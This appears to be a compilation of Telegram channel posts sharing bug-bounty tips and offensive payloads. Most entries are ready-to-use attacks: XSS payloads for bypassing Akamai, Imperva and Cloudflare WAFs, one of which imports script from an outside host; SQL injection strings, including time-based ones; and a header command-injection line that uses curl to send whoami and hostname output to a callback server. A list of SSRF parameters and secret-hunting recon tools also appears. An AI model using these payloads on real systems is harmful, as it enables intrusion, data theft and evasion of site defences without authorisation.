XSS Bypass Akamai, Imperva and CloudFlare

Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#XSS #Payload
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/Root_Exploit

SQLI Injection
CVE: 2024-36837

Payload:

0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS in Office.com. The + made a difference.

Payload:‍‍‍

`'>+<noscript>alert()</noscript>`

#BugBounty #Tips #XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

SubCerts

💬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.

📊 Features:
⚪️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.

⚪️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using httpx and
returns:
⚫️ HTTP status codes
⚫️ Page noscripts
⚫️ Silent output for clean and organized results

⚪️ Automation: Run the tool with a simple command and get results efficiently without manual effort.

⚪️ Flexible Output: Optionally save the extracted subdomains and httpx results to a file for later review.

🔼 Installation:

cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h

💻 Usage:
To run SubCerts for a domain and save the results to a file:

./subcerts.sh -u example.com --output results.txt

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #SubDomain #certificate
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

WAF bypass payloads

- Imperva/AWS
<details/open/id="&quot;"ontoggle=[JS]>

- Akamai
<details open id="' &quot;'"ontoggle=[JS]>``

#WAF #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XSS

Watch out for reflected XSS in the search parameter!

Payload:

"-->""/>Hack by Fagun</noscript><deTailS open x=">" ontoggle=(co\u006efirm)``>"

#XSS #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Export to GBounty

💬
Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command ‍`gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

📊 Features:
⚪️ Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.
⚪️ Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.
⚪️ Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.
⚪️ User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.
⚪️ Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

🔼 Installation:
Prerequisites
⚪️ Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.
⚪️ Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

💻 Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

📂 Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

📂 Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:

gbounty -rf requests.zip

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #GBounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

XٓSS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱🔥

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#BugBounty #Tips #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Time based SQLi Payload 💣

if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

Injection Points 💉
URI
parameter name (before & after)
parameter value (before & after)
HTTP Headers like User-Agent,etc...

#SQLi #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

HACKER search engines

#BugBounty #Search #Engines #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Hacking Articles- Cyber Security Mindmap

💬
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them

😸 Github

#Cyber #Security #Mindmap
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

RCE - Can we still use this in HTTP Header?

`
'
;
$
>

curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JSNinja - "Hunting Bugs in JavaScript!"

💬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.

📊 Features:
➕ Extract URLs from JavaScript files!
➕ Identify sensitive information such as API keys and tokens!
➕ User-friendly interface!
➕Open Source and actively maintained!

🔼 Installation:

sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt

💻 Usage:

python3 jsninja.py -u http://example.com/noscript.js --secrets --urls

Command-Line Options:
⚪️ -u or --url: Specify a single JavaScript URL to fetch.
⚪️ --secrets: Look for sensitive information in the JavaScript content.
⚪️ --urls: Extract URLs from the JavaScript content.
⚪️ -o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #JS #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Top 25 server-side request forgery (SSRF) parameters

Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:

⚪️ Access services on the loopback interface of the remote server
⚪️ Scan internal network an potentially interact with internal services
⚪️ Read local files on the server using file:// protocol handler
⚪️ Move laterally / pivoting into the internal environment

#SSRF #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3